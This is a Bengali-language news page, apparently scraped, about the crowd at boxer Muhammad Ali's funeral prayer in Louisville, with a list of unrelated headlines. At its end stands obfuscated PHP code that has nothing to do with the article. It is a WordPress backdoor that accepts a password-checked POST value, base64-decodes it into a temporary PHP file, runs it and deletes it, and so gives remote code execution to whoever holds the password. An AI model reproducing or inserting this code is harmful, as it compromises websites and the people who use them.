শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

মোহাম্মদ আলীর জানাজায় মানুষের ঢল

11110স্পোর্টস ডেস্ক : কিংবদন্তির মুষ্টিযোদ্ধা মোহাম্মাদ আলীর নামাজে জানাজায় উপচে পড়লো মানুষের ঢল। বৃহস্পতিবার যুক্তরাষ্ট্রের কেন্টাকির লুইভিলের ফ্রিডম হলে এই জানাজা অনুষ্ঠিত হয়। এই ফ্রিডম হলেই ১৯৬০ সালে প্রথম পেশাগতভাবে বক্সিং প্রতিযোগিতায় অংশ নিয়েছিলেন।

জানাজায় উপস্থিত হয়েছিলেন মুসলমান, ইহুদি, খ্রিষ্টান এমনকি নাস্তিকেরাও। ব্রিটিশ সংবাদমধ্যম ডেইলি মেইল জানিয়েছে, জানাজায় ১৪ হাজারেরও বেশি মানুষ উপস্থিত ছিলেন। এতে ইমামতি করেন গবেষক জাইদ সাকির। জানাজায় পুরুষ ও নারীরা পৃথকভাবে অংশ নেন। মোহাম্মদ আলীর চতুর্থ স্ত্রী লনিসহ পরিবারের সকল সদস্যই এসময় উপস্থিত ছিলেন। এমনকি আলীর সঙ্গে বিচ্ছেদ হয়ে যাওয়া তার দ্বিতীয় ও তৃতীয় স্ত্রীও এসময় উপস্থিত ছিলেন।

জানাজার আগে জাইদ সাকির বলেন, ”আজ আমরা আপনাদের সবাইকে স্বাগত জানাচ্ছি। আমরা মুসলমান, অন্য ধর্মে বিশ্বাসী মানুষ ও আইনশৃঙ্খলা বাহিনীকে স্বাগত জানাচ্ছি।”

তিনি বলেন, ”মোহাম্মদ আলী এতো মানুষের হৃদয় ছুঁতে পেরেছিলেন এ কারণে যে, তিনি তার নীতি ও আদর্শের জন্য খ্যাতি, অর্থ সবই ছাড়তে প্রস্তুত ছিলেন।”

আমেরিকান মুসলিম কমিউনিটির সদস্য শেরম্যান জ্যাকসন বলেন, ”আলী ছিলেন সাধারণ মানুষের চ্যাম্পিয়ন এবং মানুষের জন্যই তিনি চ্যাম্পিয়ন হয়েছেন।”

শুক্রবার কেন্টাকি এক্সপোজিশন সেন্টারে মোহাম্মদ আলীর স্মরণসভা অনুষ্ঠিত হবে। এতে তুরস্কের প্রেসিডেন্ট রিসেপ তায়েপ এরদোগানসহ অনেক বিশ্ব নেতা অংশগ্রহণ করবেন। অনুষ্ঠানে সাবেক প্রেসিডেন্ট বিল ক্লিনটন স্তুতিপত্র পাঠ করবেন। এই স্মরণসভায় অংশ নেওয়ার জন্য ১৫ হাজার ৫০০ টিকিটের ব্যবস্থা করা হয়েছিল। তবে মাত্র এক ঘন্টার মধ্যে সব টিকিট বিক্রি হয়ে গেছে।

প্রসঙ্গত, গত শুক্রবার মোহাম্মদ আলী অ্যারিজোনার একটি হাসপাতালে চিকিৎসাধীন অবস্থায় মারা যায়। তিনি শ্বাসকষ্টসহ বিভিন্ন রোগে ভুগছিলেন।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}